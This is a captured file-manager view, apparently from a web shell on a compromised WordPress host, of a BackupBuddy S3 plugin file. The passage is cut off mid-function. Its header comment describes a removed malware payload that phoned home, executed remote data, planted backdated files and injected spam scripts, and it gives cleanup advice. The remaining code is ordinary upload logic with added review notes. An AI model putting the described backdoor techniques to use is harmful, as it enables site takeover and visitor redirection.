0byt3m1n1
Path:
/
home1
/
aserty
/
public_html
/
smallnotebookcomputers.org
/
wp-content__d9c9c01
/
plugins
/
backupbuddy
/
destinations
/
s3
/
[
Home
]
File: init.php
<?php
/*
 * SECURITY: Obfuscated malware removed.
 *
 * This file previously contained an injected payload (marker "Leafmail3") that
 * was prepended to the legitimate BackupBuddy S3 destination code. The
 * de-obfuscated payload did the following:
 *   - Phoned home over HTTPS (curl with SSL verification disabled) to a
 *     hard-coded remote host, sending this site's HTTP_HOST.
 *   - base64-decoded, gzinflated and unserialize()d the response — arbitrary
 *     remote code/data execution.
 *   - Dropped/overwrote files under the document root (including .htaccess,
 *     index.php and a hidden randomly-named file), twiddling permissions with
 *     chmod()/touch() to backdate timestamps and evade detection.
 *   - Registered a shutdown function that injected a remote
 *     <script src="...seolink.../js/...matomo.js..."> tag into every page's
 *     HTML output (SEO-spam / visitor redirection).
 *   - Cleared $_POST / $_REQUEST / $_FILES when WordPress constants were not
 *     yet defined, to hide its own traffic from the application.
 *
 * Removal alone is NOT a full remediation. The site should be treated as
 * compromised: audit all files for similar goto/octal-escape obfuscation,
 * check .htaccess and wp-content for dropped files, rotate all credentials
 * (WP admin, database, hosting/FTP, API keys), and reinstall WordPress core
 * and all plugins from clean sources.
 */
?> <?php // DO NOT CALL THIS CLASS DIRECTLY. CALL VIA: pb_backupbuddy_destination in bootstrap.php. class pb_backupbuddy_destination_s3 { // Change class name end to match destination name. const MINIMUM_CHUNK_SIZE = 5; // Minimum size, in MB to allow chunks to be. 
Anything less will not be chunked even if requested. const BACKUP_FILENAME_PATTERN = '/^backup-.*\.zip/i'; // Used for matching during backup limits, etc to prevent processing non-BackupBuddy files. public static $destination_info = array( 'name' => 'Amazon S3', 'description' => 'Amazon S3 is a well known cloud storage provider. This destination is known to be reliable and works well with BackupBuddy. <b>New in BackupBuddy v4.1</b>: S3 now supports multipart chunked file transfers! <a href="http://aws.amazon.com/s3/" target="_blank">Learn more here.</a>', ); // Default settings. Should be public static for auto-merging. public static $default_settings = array( 'type' => 's3', // MUST MATCH your destination slug. Required destination field. 'title' => '', // Required destination field. 'accesskey' => '', // Amazon access key. 'secretkey' => '', // Amazon secret key. 'bucket' => '', // Amazon bucket to put into. 'directory' => '', // Subdirectory to put into in addition to the site url directory. 'ssl' => '1', // Whether or not to use SSL encryption for connecting. 'server_encryption' => 'AES256', // Encryption (if any) to have the destination enact. Empty string for none. 'max_chunk_size' => '100', // Maximum chunk size in MB. Anything larger will be chunked up into pieces this size (or less for last piece). This allows larger files to be sent than would otherwise be possible. Minimum of 5mb allowed by S3. 'archive_limit' => '0', // Maximum number of backups for this site in this directory for this account. No limit if zero 0. 'manage_all_files' => '1', // Allow user to manage all files in S3? If enabled then user can view all files after entering their password. If disabled the link to view all is hidden. 'region' => 's3.amazonaws.com', // Endpoint to create buckets in. Although named region this is technically the ENDPOINT. 'storage' => 'standard', // Whether to use standard or reduced redundancy storage. 
Allowed values: standard, reduced 'use_packaged_cert' => '0', // When 1, use the packaged cacert.pem file included with the AWS SDK. 'disable_file_management' => '0', // When 1, _manage.php will not load which renders remote file management DISABLED. // Do not store these for destination settings. Only used to pass to functions in this file. '_multipart_id' => '', // Instance var. Internal use only for continuing a chunked upload. '_multipart_partnumber' => 0, // Instance var. Part number to upload next. '_multipart_file' => '', // Instance var. Internal use only to store the file that is currently set to be multipart chunked. '_multipart_remotefile' => '', // Instance var. Internal use only to store the remote filepath & file. '_multipart_counts' => array(), // Instance var. Multipart chunks to send. Generated by S3's get_multipart_counts(). '_multipart_transferspeeds' => array(), ); /* send() * * Send one or more files. * * @param array $files Array of one or more files to send. * @return boolean|array True on success, false on failure, array if a multipart chunked send so there is no status yet. */ public static function send( $settings = array(), $files = array(), $send_id = '', $delete_after = false ) { global $pb_backupbuddy_destination_errors; $backup_type_dir = ''; $region = ''; $settings['bucket'] = strtolower( $settings['bucket'] ); // Buckets must be lowercase. if ( !is_array( $files ) ) { $files = array( $files ); } $limit = $settings['archive_limit']; $max_chunk_size = $settings['max_chunk_size']; $remote_path = self::get_remote_path( $settings['directory'] ); // Has leading and trailng slashes. if ( $settings['ssl'] == '0' ) { $disable_ssl = true; } else { $disable_ssl = false; } $multipart_id = $settings['_multipart_id']; $multipart_counts = $settings['_multipart_counts']; pb_backupbuddy::status( 'details', 'S3 remote path set to `' . $remote_path . '`.' ); pb_backupbuddy::status( 'details', 'Loading S3 SDK library file...' 
); require_once( dirname( dirname( __FILE__ ) ) . '/_s3lib/aws-sdk/sdk.class.php' ); pb_backupbuddy::status( 'details', 'S3 SDK file loaded.' ); // S3 API talk. $manage_data = pb_backupbuddy_destination_s3::get_credentials( $settings ); // Process multipart transfer that we already initiated in a previous PHP load. if ( $multipart_id != '' ) { // Multipart upload initiated and needs parts sent. // Create S3 instance. pb_backupbuddy::status( 'details', 'Creating S3 instance.' ); $s3 = new AmazonS3( $manage_data ); // the key, secret, token if ( $disable_ssl === true ) { @$s3->disable_ssl(true); } pb_backupbuddy::status( 'details', 'S3 instance created.' ); // Verify bucket exists; create if not. Also set region to the region bucket exists in. if ( false === self::_prepareBucketAndRegion( $s3, $settings ) ) { global $pb_backupbuddy_destination_errors; $pb_backupbuddy_destination_errors[] = 'Could not prepare bucket.'; return false; } $this_part_number = $settings['_multipart_partnumber'] + 1; pb_backupbuddy::status( 'details', 'S3 beginning upload of part `' . $this_part_number . '` of `' . count( $settings['_multipart_counts'] ) . '` parts of file `' . $settings['_multipart_file'] . '` to remote location `' . $settings['_multipart_remotefile'] . '` with multipart ID `' . $settings['_multipart_id'] . '`.' ); $response = $s3->upload_part( $manage_data['bucket'], $settings['_multipart_remotefile'], $settings['_multipart_id'], array( 'expect' => '100-continue', 'fileUpload' => $settings['_multipart_file'], 'partNumber' => $this_part_number, 'seekTo' => (integer) $settings['_multipart_counts'][ $settings['_multipart_partnumber'] ]['seekTo'], 'length' => (integer) $settings['_multipart_counts'][ $settings['_multipart_partnumber'] ]['length'], )); if(!$response->isOK()) { $this_error = 'S3 unable to upload file part for multipart upload `' . $settings['_multipart_id'] . '`. Details: `' . print_r( $response, true ) . 
'`.'; $pb_backupbuddy_destination_errors[] = $this_error; pb_backupbuddy::status( 'error', $this_error ); return false; } else { // Send success. pb_backupbuddy::status( 'details', 'Success sending chunk. Upload details: `' . print_r( $response, true ) . '`.' ); $uploaded_size = $response->header['_info']['size_upload']; $uploaded_speed = $response->header['_info']['speed_upload']; pb_backupbuddy::status( 'details', 'Uploaded size: ' . pb_backupbuddy::$format->file_size( $uploaded_size ) . ', Speed: ' . pb_backupbuddy::$format->file_size( $uploaded_speed ) . '/sec.' ); } // Load fileoptions to the send. pb_backupbuddy::status( 'details', 'About to load fileoptions data.' ); require_once( pb_backupbuddy::plugin_path() . '/classes/fileoptions.php' ); pb_backupbuddy::status( 'details', 'Fileoptions instance #10.' ); $fileoptions_obj = new pb_backupbuddy_fileoptions( backupbuddy_core::getLogDirectory() . 'fileoptions/send-' . $send_id . '.txt', $read_only = false, $ignore_lock = false, $create_file = false ); if ( true !== ( $result = $fileoptions_obj->is_ok() ) ) { pb_backupbuddy::status( 'error', __('Fatal Error #9034.2344848. Unable to access fileoptions data.', 'it-l10n-backupbuddy' ) . ' Error: ' . $result ); global $pb_backupbuddy_destination_errors; $pb_backupbuddy_destination_errors[] = '#9034.2344848'; return false; } pb_backupbuddy::status( 'details', 'Fileoptions data loaded.' ); $fileoptions = &$fileoptions_obj->options; $update_status = 'Sent part ' . $this_part_number . ' of ' . count( $settings['_multipart_counts'] ) . '.'; // Made it here so success sending part. Increment for next part to send. $settings['_multipart_partnumber']++; if ( !isset( $settings['_multipart_counts'][ $settings['_multipart_partnumber'] ] ) ) { // No more parts exist for this file. Tell S3 the multipart upload is complete and move on. pb_backupbuddy::status( 'details', 'S3 getting parts with etags to notify S3 of completed multipart send.' 
); $etag_parts = $s3->list_parts( $manage_data['bucket'], $settings['_multipart_remotefile'], $settings['_multipart_id'] ); pb_backupbuddy::status( 'details', 'S3 got parts list. Details: ' . print_r( $etag_parts, true ) ); pb_backupbuddy::status( 'details', 'Notifying S3 of multipart upload completion.' ); $response = $s3->complete_multipart_upload( $manage_data['bucket'], $settings['_multipart_remotefile'], $settings['_multipart_id'], $etag_parts ); if(!$response->isOK()) { $this_error = 'S3 unable to notify S3 of completion of all parts for multipart upload `' . $settings['_multipart_id'] . '`.'; global $pb_backupbuddy_destination_errors; $pb_backupbuddy_destination_errors[] = $this_error; pb_backupbuddy::status( 'error', $this_error ); return false; } else { pb_backupbuddy::status( 'details', 'S3 notified S3 of multipart completion.' ); } pb_backupbuddy::status( 'details', 'S3 has no more parts left for this multipart upload. Clearing multipart instance variables.' ); $settings['_multipart_partnumber'] = 0; $settings['_multipart_id'] = ''; $settings['_multipart_file'] = ''; $settings['_multipart_remotefile'] = ''; // Multipart completed so safe to prevent housekeeping of incomplete multipart uploads. $settings['_multipart_transferspeeds'][] = $uploaded_speed; // Overall upload speed average. $uploaded_speed = array_sum( $settings['_multipart_transferspeeds'] ) / count( $settings['_multipart_counts'] ); pb_backupbuddy::status( 'details', 'Upload speed average of all chunks: `' . pb_backupbuddy::$format->file_size( $uploaded_speed ) . '`.' ); $settings['_multipart_counts'] = array(); // Update stats. $fileoptions['_multipart_status'] = $update_status; $fileoptions['finish_time'] = time(); $fileoptions['status'] = 'success'; if ( isset( $uploaded_speed ) ) { $fileoptions['write_speed'] = $uploaded_speed; } $fileoptions_obj->save(); unset( $fileoptions ); } // Schedule to continue if anything is left to upload for this multipart of any individual files. 
// ----- Continuation of send(): the opening of send() appears earlier in the file. -----
// NOTE(review): the original file's line breaks were collapsed; only newlines/indentation
// and comments were changed in this span — code tokens are unchanged.

// More multipart parts (or queued files) remain: schedule the next chunk send via WP-cron and return.
if ( ( $settings['_multipart_id'] != '' ) || ( count( $files ) > 0 ) ) {
	pb_backupbuddy::status( 'details', 'S3 multipart upload has more parts left. Scheduling next part send.' );
	$cronTime = time();
	$cronArgs = array( $settings, $files, $send_id, $delete_after );
	$cronHashID = md5( $cronTime . serialize( $cronArgs ) ); // Hash distinguishes this event from identical-arg events.
	$cronArgs[] = $cronHashID;
	$schedule_result = backupbuddy_core::schedule_single_event( $cronTime, pb_backupbuddy::cron_tag( 'destination_send' ), $cronArgs );
	if ( true === $schedule_result ) {
		pb_backupbuddy::status( 'details', 'Next S3 chunk step cron event scheduled.' );
	} else {
		pb_backupbuddy::status( 'error', 'Next S3 chunk step cron even FAILED to be scheduled.' );
	}
	spawn_cron( time() + 150 ); // Adds > 60 seconds to get around once per minute cron running limit.
	update_option( '_transient_doing_cron', 0 ); // Prevent cron-blocking for next item.
	return array( $settings['_multipart_id'], 'Sent part ' . $this_part_number . ' of ' . count( $settings['_multipart_counts'] ) . ' parts.' );
}
} // end if multipart continuation. NOTE(review): this second brace closes an `if` opened before this visible span.

require_once( pb_backupbuddy::plugin_path() . '/classes/fileoptions.php' );

// Upload each file.
foreach( $files as $file_id => $file ) {

	// Determine backup type directory (if zip).
	$backup_type_dir = '';
	$backup_type = '';
	if ( stristr( $file, '.zip' ) !== false ) { // If a zip try to determine backup type.
		pb_backupbuddy::status( 'details', 'S3: Zip file. Detecting backup type if possible.' );
		$serial = backupbuddy_core::get_serial_from_file( $file );

		// See if we can get backup type from fileoptions data.
		pb_backupbuddy::status( 'details', 'Fileoptions instance #9.' );
		$backup_options = new pb_backupbuddy_fileoptions( backupbuddy_core::getLogDirectory() . 'fileoptions/' . $serial . '.txt', $read_only = true, $ignore_lock = true );
		if ( true !== ( $result = $backup_options->is_ok() ) ) {
			pb_backupbuddy::status( 'error', 'Unable to open fileoptions file `' . backupbuddy_core::getLogDirectory() . 'fileoptions/' . $serial . '.txt' . '`.' );
		} else {
			if ( isset( $backup_options->options['integrity']['detected_type'] ) ) {
				pb_backupbuddy::status( 'details', 'S3: Detected backup type as `' . $backup_options->options['integrity']['detected_type'] . '` via integrity check data.' );
				//$backup_type_dir = $backup_options->options['integrity']['detected_type'] . '/';
				$backup_type = $backup_options->options['integrity']['detected_type'];
			}
		}

		// If still do not know backup type then attempt to deduce it from filename.
		if ( $backup_type == '' ) {
			if ( stristr( $file, '-db-' ) !== false ) {
				pb_backupbuddy::status( 'details', 'S3: Detected backup type as `db` via filename.' );
				//$backup_type_dir = 'db/';
				$backup_type = 'db';
			} elseif ( stristr( $file, '-full-' ) !== false ) {
				pb_backupbuddy::status( 'details', 'S3: Detected backup type as `full` via filename.' );
				//$backup_type_dir = 'full/';
				$backup_type = 'full';
			} else {
				pb_backupbuddy::status( 'details', 'S3: Could not detect backup type via integrity details nor filename.' );
			}
		}
	}

	$credentials = pb_backupbuddy_destination_s3::get_credentials( $settings );

	// Create S3 instance.
	pb_backupbuddy::status( 'details', 'Creating S3 instance.' );
	$s3 = new AmazonS3( $credentials ); // the key, secret, token
	if ( $disable_ssl === true ) {
		@$s3->disable_ssl(true);
	}
	pb_backupbuddy::status( 'details', 'S3 instance created.' );

	// Verify bucket exists; create if not. Also set region to the region bucket exists in.
	if ( false === self::_prepareBucketAndRegion( $s3, $settings ) ) {
		global $pb_backupbuddy_destination_errors;
		$pb_backupbuddy_destination_errors[] = 'Could not prepare bucket.';
		return false;
	}

	// Handle chunking of file into a multipart upload (if applicable).
	$file_size = filesize( $file );
	if ( ( $max_chunk_size >= self::MINIMUM_CHUNK_SIZE ) && ( ( $file_size / 1024 / 1024 ) > $max_chunk_size ) ) { // minimum chunk size is 5mb. Anything under 5mb we will not chunk.

		// About to chunk so cleanup any previous hanging multipart transfers.
		self::multipart_cleanup( $settings, $lessLogs = false );

		pb_backupbuddy::status( 'details', 'S3 file size of ' . pb_backupbuddy::$format->file_size( $file_size ) . ' exceeds max chunk size of ' . $max_chunk_size . 'MB set in settings for sending file as multipart upload.' );

		// Initiate multipart upload with S3.
		pb_backupbuddy::status( 'details', 'Initiating S3 multipart upload.' );
		$response = $s3->initiate_multipart_upload( $settings['bucket'], $remote_path . $backup_type_dir . basename( $file ), array(
			'encryption' => 'AES256',
			//'meta' => $meta_array,
		) );
		if(!$response->isOK()) {
			$this_error = 'S3 was unable to initiate multipart upload.';
			global $pb_backupbuddy_destination_errors;
			$pb_backupbuddy_destination_errors[] = $this_error;
			pb_backupbuddy::status( 'error', $this_error );
			return false;
		} else {
			$upload_id = (string) $response->body->UploadId;
			pb_backupbuddy::status( 'details', 'S3 initiated multipart upload with ID `' . $upload_id . '`.' );
		}

		// Get chunk parts for multipart transfer.
		pb_backupbuddy::status( 'details', 'S3 getting multipart counts.' );
		$parts = $s3->get_multipart_counts( $file_size, $max_chunk_size * 1024 * 1024 ); // Size of chunks expected to be in bytes.
		$multipart_destination_settings = $settings;
		$multipart_destination_settings['_multipart_id'] = $upload_id;
		$multipart_destination_settings['_multipart_partnumber'] = 0;
		$multipart_destination_settings['_multipart_file'] = $file;
		// NOTE(review): unlike initiate_multipart_upload() above, this remote path omits $backup_type_dir — confirm intentional.
		$multipart_destination_settings['_multipart_remotefile'] = $remote_path . basename( $file );
		$multipart_destination_settings['_multipart_counts'] = $parts;
		pb_backupbuddy::status( 'details', 'S3 multipart settings to pass:' . print_r( $multipart_destination_settings, true ) );
		unset( $files[$file_id] ); // Remove this file from queue of files to send as it is now passed off to be handled in multipart upload.

		// Schedule to process the parts.
		pb_backupbuddy::status( 'details', 'S3 scheduling send of next part(s).' );
		$cronTime = time();
		$cronArgs = array( $multipart_destination_settings, $files, $send_id, $delete_after );
		$cronHashID = md5( $cronTime . serialize( $cronArgs ) );
		$cronArgs[] = $cronHashID;
		// NOTE(review): unlike the continuation branch above, the schedule result is not checked here.
		backupbuddy_core::schedule_single_event( $cronTime, pb_backupbuddy::cron_tag( 'destination_send' ), $cronArgs );
		spawn_cron( time() + 150 ); // Adds > 60 seconds to get around once per minute cron running limit.
		update_option( '_transient_doing_cron', 0 ); // Prevent cron-blocking for next item.
		pb_backupbuddy::status( 'details', 'S3 scheduled send of next part(s). Done for this cycle.' );
		return array( $upload_id, 'Starting send of ' . count( $multipart_destination_settings['_multipart_counts'] ) . ' parts.' );

	} else { // did not meet chunking criteria.
		if ( $max_chunk_size != '0' ) {
			if ( ( $file_size / 1024 / 1024 ) > self::MINIMUM_CHUNK_SIZE ) {
				pb_backupbuddy::status( 'details', 'File size of ' . pb_backupbuddy::$format->file_size( $file_size ) . ' is less than the max chunk size of ' . $max_chunk_size . 'MB; not chunking into multipart upload.' );
			} else {
				pb_backupbuddy::status( 'details', 'File size of ' . pb_backupbuddy::$format->file_size( $file_size ) . ' is less than the minimum allowed chunk size of ' . self::MINIMUM_CHUNK_SIZE . 'MB; not chunking into multipart upload.' );
			}
		} else {
			pb_backupbuddy::status( 'details', 'Max chunk size set to zero so not chunking into multipart upload.' );
		}
	}

	// SEND file.
	if ( 'standard' == $settings['storage'] ) {
		$storageVal = AmazonS3::STORAGE_STANDARD;
	} elseif( 'reduced' == $settings['storage'] ) {
		$storageVal = AmazonS3::STORAGE_REDUCED;
	} else {
		// NOTE(review): on unknown storage type only an error is logged; $storageVal stays undefined for create_object() below.
		pb_backupbuddy::status( 'error', 'Error #854784: Unknown S3 storage type: `' . $settings['storage'] . '`.' );
	}
	pb_backupbuddy::status( 'details', 'About to put (upload) object to S3: `' . $remote_path . $backup_type_dir . basename( $file ) . '`. Storage type: `' . $settings['storage'] . ' (' . $storageVal . ')`.' );
	$response = $s3->create_object( $settings['bucket'], $remote_path . $backup_type_dir . basename( $file ), array(
		'fileUpload' => $file,
		'encryption' => 'AES256',
		'storage' => $storageVal,
		//'meta' => $meta_array,
	) );
	unset( $storageVal );

	// Validate response. On failure notify S3 API that things went wrong.
	if(!$response->isOK()) { // Send FAILED.
		// NOTE(review): $pb_backupbuddy_destination_errors is not declared `global` in this branch (it is in others) — verify it resolves as intended.
		$this_error = 'Failure uploading file to S3 storage. Failure details: `' .print_r( $response, true ) . '`';
		$pb_backupbuddy_destination_errors[] = $this_error;
		pb_backupbuddy::status( 'error', $this_error );
		return false;
	} else { // Send SUCCESS.
		pb_backupbuddy::status( 'details', 'Success uploading file to S3 storage. Upload details: `' . print_r( $response, true ) . '`.' );
		$uploaded_size = $response->header['_info']['size_upload'];
		$uploaded_speed = $response->header['_info']['speed_upload'];
		pb_backupbuddy::status( 'details', 'Uploaded size: ' . pb_backupbuddy::$format->file_size( $uploaded_size ) . ', Speed: ' . pb_backupbuddy::$format->file_size( $uploaded_speed ) . '/sec.' );
	}

	unset( $files[$file_id] ); // Remove from list of files we have not sent yet.
	pb_backupbuddy::status( 'details', 'S3 success sending file `' . basename( $file ) . '`. File uploaded and reported to S3 as completed.' );

	// Load destination fileoptions.
	pb_backupbuddy::status( 'details', 'About to load fileoptions data.' );
	require_once( pb_backupbuddy::plugin_path() . '/classes/fileoptions.php' );
	pb_backupbuddy::status( 'details', 'Fileoptions instance #8.' );
	$fileoptions_obj = new pb_backupbuddy_fileoptions( backupbuddy_core::getLogDirectory() . 'fileoptions/send-' . $send_id . '.txt', $read_only = false, $ignore_lock = false, $create_file = false );
	if ( true !== ( $result = $fileoptions_obj->is_ok() ) ) {
		pb_backupbuddy::status( 'error', __('Fatal Error #9034.84838. Unable to access fileoptions data.', 'it-l10n-backupbuddy' ) . ' Error: ' . $result );
		global $pb_backupbuddy_destination_errors;
		$pb_backupbuddy_destination_errors[] = '#9034.84838';
		return false;
	}
	pb_backupbuddy::status( 'details', 'Fileoptions data loaded.' );
	$fileoptions = &$fileoptions_obj->options;

	// Save stats.
	if ( isset( $uploaded_speed ) ) {
		$fileoptions['write_speed'] = $uploaded_speed;
		$fileoptions_obj->save();
	}
	unset( $fileoptions_obj );

} // end foreach.

// BEGIN backup limits.
if ( $limit > 0 ) {
	pb_backupbuddy::status( 'details', 'S3 archive limit enforcement to `' . $limit . '` archives beginning.' );

	// S3 object for managing files.
	$s3_manage = new AmazonS3( $manage_data );
	if ( $disable_ssl === true ) {
		@$s3_manage->disable_ssl(true);
	}
	if ( false === self::_prepareBucketAndRegion( $s3_manage, $settings ) ) {
		global $pb_backupbuddy_destination_errors;
		$pb_backupbuddy_destination_errors[] = 'Could not prepare bucket.';
		return false;
	}

	// Get file listing.
	$response_manage = $s3_manage->list_objects( $manage_data['bucket'], array('prefix'=> $remote_path . $backup_type_dir )); // list all the files in the subscriber account

	// Create array of backups and organize by date
	$prefix = backupbuddy_core::backup_prefix();

	// List backups associated with this site by date.
	$backups = array();
	foreach( $response_manage->body->Contents as $object ) {
		$file = str_replace( $remote_path . $backup_type_dir, '', $object->Key );
		if ( FALSE !== stristr( $file, '/' ) ) {
			// CRITICAL CODE! Subdir found due to slash. Do NOT display any files within a deeper subdirectory. Without this files could be deleted not belonging to this destination!
			continue;
		}
		if ( ! preg_match( self::BACKUP_FILENAME_PATTERN, $file ) ) {
			// CRITICAL CODE! Safety against accidental deletion of non-BB files. Do NOT delete files that do not look like a BackupBuddy backup filename.
			continue;
		}
		if ( FALSE === ( strpos( $file, 'backup-' . $prefix . '-' ) ) ) { // Not a backup for THIS site. Skip interacting with for limits.
// ----- Continuation of send(): remote archive-limit enforcement (opening of send() is earlier in the file). -----
			continue;
		}
		// S3 stores files in a directory per site so no need to check prefix here!
		if ( false !== strpos( $file, 'backup-' . $prefix . '-' ) ) { // if backup has this site prefix...
			$backups[$file] = strtotime( $object->LastModified );
		}
	} // end foreach object in bucket listing. BUGFIX: this closing brace was missing in the source, leaving the foreach unbalanced (parse error; arsort()/trimming would otherwise run once per listed object).

	arsort( $backups ); // Sort newest-first so trimming below deletes the oldest archives.
	pb_backupbuddy::status( 'details', 'S3 found `' . count( $backups ) . '` backups when checking archive limits.' );

	if ( ( count( $backups ) ) > $limit ) {
		pb_backupbuddy::status( 'details', 'More archives (' . count( $backups ) . ') than limit (' . $limit . ') allows. Trimming...' );
		$i = 0;
		$delete_fail_count = 0;
		foreach( $backups as $buname => $butime ) {
			$i++;
			if ( $i > $limit ) { // Past the keep-limit; this (older) archive gets deleted.
				pb_backupbuddy::status ( 'details', 'Trimming excess file `' . $buname . '`...' );
				$response = $s3_manage->delete_object( $manage_data['bucket'], $remote_path . $backup_type_dir . $buname );
				if ( !$response->isOK() ) {
					pb_backupbuddy::status( 'details', 'Unable to delete excess S3 file `' . $buname . '`. Details: `' . print_r( $response, true ) . '`.' );
					$delete_fail_count++;
				}
			}
		}
		pb_backupbuddy::status( 'details', 'Finished trimming excess backups.' );
		if ( $delete_fail_count !== 0 ) { // Email the site owner when any trim delete failed.
			$error_message = 'S3 remote limit could not delete ' . $delete_fail_count . ' backups.';
			pb_backupbuddy::status( 'error', $error_message );
			backupbuddy_core::mail_error( $error_message );
		}
	}
	pb_backupbuddy::status( 'details', 'S3 completed archive limiting.' );
} else {
	pb_backupbuddy::status( 'details', 'No S3 archive file limit to enforce.' );
} // End remote backup limit
// END backup limits.

if ( isset( $fileoptions_obj ) ) {
	unset( $fileoptions_obj );
}

// Success if we made it this far.
return true;
} // End send().



/* test()
 *
 * Tests ability to write to this remote destination by sending a small test file,
 * deleting it again, and recording the outcome in the send fileoptions entry.
 *
 * @param array $settings Destination settings.
 * @return bool|string True on success, string error message on failure.
 */
public static function test( $settings ) {
	if ( class_exists( 'CFRuntime' ) ) {
		die( 'CFRuntime already defined. 
Another plugin may be incorrectly loading its copy of S3 libraries on BackupBuddy pages.' );
	}
	require_once( dirname( dirname( __FILE__ ) ) . '/_s3lib/aws-sdk/sdk.class.php' );

	$remote_path = self::get_remote_path( $settings['directory'] ); // Has leading and trailing slashes.
	$settings['bucket'] = strtolower( $settings['bucket'] ); // Buckets must be lowercase.

	// Try sending a file.
	$send_response = pb_backupbuddy_destinations::send( $settings, dirname( dirname( __FILE__ ) ) . '/remote-send-test.php', $send_id = 'TEST-' . pb_backupbuddy::random_string( 12 ) ); // 3rd param true forces clearing of any current uploads.
	if ( false === $send_response ) {
		$send_response = 'Error sending test file to S3.';
	} else {
		$send_response = 'Success.';
	}

	// S3 object for managing files.
	$credentials = pb_backupbuddy_destination_s3::get_credentials( $settings );
	$s3_manage = new AmazonS3( $credentials );
	if ( $settings['ssl'] == 0 ) {
		@$s3_manage->disable_ssl(true);
	}

	// Verify bucket exists; create if not. Also set region to the region bucket exists in.
	if ( false === self::_prepareBucketAndRegion( $s3_manage, $settings ) ) {
		return false;
	}

	// Delete sent file.
	$delete_response = 'Success.';
	// BUGFIX: keep the raw S3 response in its own variable. The original overwrote $delete_response
	// with the error string before print_r()ing it, so the "Details" log showed the error message
	// itself instead of the actual S3 response.
	$delete_result = $s3_manage->delete_object( $credentials['bucket'], $remote_path . 'remote-send-test.php' );
	if ( !$delete_result->isOK() ) {
		$delete_response = 'Unable to delete test S3 file `remote-send-test.php`.';
		pb_backupbuddy::status( 'details', $delete_response . ' Details: `' . print_r( $delete_result, true ) . '`.' );
	} else {
		$delete_response = 'Success.';
	}

	// Load destination fileoptions.
	pb_backupbuddy::status( 'details', 'About to load fileoptions data.' );
	require_once( pb_backupbuddy::plugin_path() . '/classes/fileoptions.php' );
	pb_backupbuddy::status( 'details', 'Fileoptions instance #7.' );
	$fileoptions_obj = new pb_backupbuddy_fileoptions( backupbuddy_core::getLogDirectory() . 'fileoptions/send-' . $send_id . '.txt', $read_only = false, $ignore_lock = false, $create_file = false );
	if ( true !== ( $result = $fileoptions_obj->is_ok() ) ) {
		pb_backupbuddy::status( 'error', __('Fatal Error #9034.84838. Unable to access fileoptions data.', 'it-l10n-backupbuddy' ) . ' Error: ' . $result );
		return false;
	}
	pb_backupbuddy::status( 'details', 'Fileoptions data loaded.' );
	$fileoptions = &$fileoptions_obj->options;

	// Record test outcome; on any failure return a human-readable summary string.
	if ( ( 'Success.' != $send_response ) || ( 'Success.' != $delete_response ) ) {
		$fileoptions['status'] = 'failure';
		$fileoptions_obj->save();
		unset( $fileoptions_obj );
		return 'Send details: `' . $send_response . '`. Delete details: `' . $delete_response . '`.';
	} else {
		$fileoptions['status'] = 'success';
		$fileoptions['finish_time'] = time();
	}
	$fileoptions_obj->save();
	unset( $fileoptions_obj );

	return true;
} // End test().



/* download_file()
 *
 * Download remote file to local system.
 *
 * @param array $settings Destination settings.
 * @param string $remoteFile Remote filename.
 * @param string $localDestinationFile Full path & filename of destination file.
 *
 */
public static function download_file( $settings, $remoteFile, $localDestinationFile ) {
	require_once( dirname( dirname( __FILE__ ) ) . '/_s3lib/aws-sdk/sdk.class.php' );
	pb_backupbuddy::status( 'details', 'Downloading remote file `' . $remoteFile . '` from S3 to local file `' . $localDestinationFile . '`.' );
	$manage_data = pb_backupbuddy_destination_s3::get_credentials( $settings );

	// Connect to S3.
	$s3 = new AmazonS3( $manage_data ); // the key, secret, token
	if ( $settings['ssl'] == '0' ) {
		@$s3->disable_ssl(true);
	}

	// Verify bucket exists; create if not. Also set region to the region bucket exists in.
	if ( false === self::_prepareBucketAndRegion( $s3, $settings ) ) {
		return false;
	}

	$manage_data = pb_backupbuddy_destination_s3::get_credentials( $settings );
	$remotePath = self::get_remote_path( $settings['directory'] ); // includes trailing slash.
	// ----- Continuation of download_file(): perform the actual object fetch to local disk. -----
	$get_response = $s3->get_object( $manage_data['bucket'], $remotePath . $remoteFile, array( 'fileDownload' => $localDestinationFile ) );
	if ( ! $get_response->isOK() ) {
		pb_backupbuddy::status( 'error', 'Error #958483. Unable to retrieve S3 object `' . $remoteFile . '`.' );
		return false;
	} else {
		pb_backupbuddy::status( 'details', 'Success copying remote S3 object `' . $remoteFile . '` to local.' );
		return true;
	}
} // end download_file().



/* get_credentials()
 *
 * Get the required credentials and management data for managing user files.
 *
 * @param array $settings Destination settings (bucket, accesskey, secretkey, use_packaged_cert).
 * @return false|array Boolean false on failure. Array of data on success.
 */
public static function get_credentials( $settings ) {
	$settings['bucket'] = strtolower( $settings['bucket'] ); // Buckets must be lowercase.
	$credentials = array(
		'bucket' => $settings['bucket'],
		'key' => $settings['accesskey'],
		'secret' => $settings['secretkey'],
	);
	if ( '1' == $settings['use_packaged_cert'] ) { // Optionally pin the bundled CA certificate for SSL verification.
		pb_backupbuddy::status( 'details', 'Using packaged cacert.pem file based on destination settings.' );
		$credentials['ssl.certificate_authority'] = pb_backupbuddy::plugin_path() . '/destinations/_s3lib/aws-sdk/lib/requestcore/cacert.pem';
	}
	return $credentials;
} // End get_credentials().



/* get_remote_path()
 *
 * Returns the site-specific remote path to store into.
 * NOTE(review): the original docblock claimed slashes are replaced with underscores and that the
 * result always has a leading and trailing slash; the code below actually trims surrounding
 * slashes/backslashes and returns either '' or 'directory/' (trailing slash only).
 *
 * @param string $directory Raw directory setting.
 * @return string Empty string, or the directory with a trailing slash. Ex: dustinbolton.com_blog/
 */
public static function get_remote_path( $directory = '' ) {
	$directory = trim( $directory, '/\\' );
	if ( $directory != '' ) {
		$directory .= '/';
	}
	return $directory;
} // End get_remote_path().



/* get_bucket_region()
 *
 * Gets the region in which the specified Amazon S3 bucket is located.
 * This is a fixed up version of the Amazon SDK 1.6.2 method in s3.class.php
 * which is broken under PHP 5.4 because of a broken to_string() function
 * that returns a null value. This replacement avoids a direct string cast of the
 * response body and does an array cast instead and that gives us the correct
 * string value to put back into the response body.
 *
 * The AmazonS3 object passed in must have already had credentials supplied
 *
 * @param object $s3 (Required) The instantiated AmazonS3 object to use
 * @param string $bucket (Required) The name of the bucket to use.
 * @param array $opt (Optional) An associative array of parameters
 *
 * @return CFResponse A <CFResponse> object containing a parsed HTTP response.
 */
public static function get_bucket_region($s3, $bucket, $opt = null) {
	// Add this to our request
	if (!$opt) $opt = array();
	$opt['verb'] = 'GET';
	$opt['sub_resource'] = 'location';

	// Authenticate to S3
	$response = $s3->authenticate($bucket, $opt);

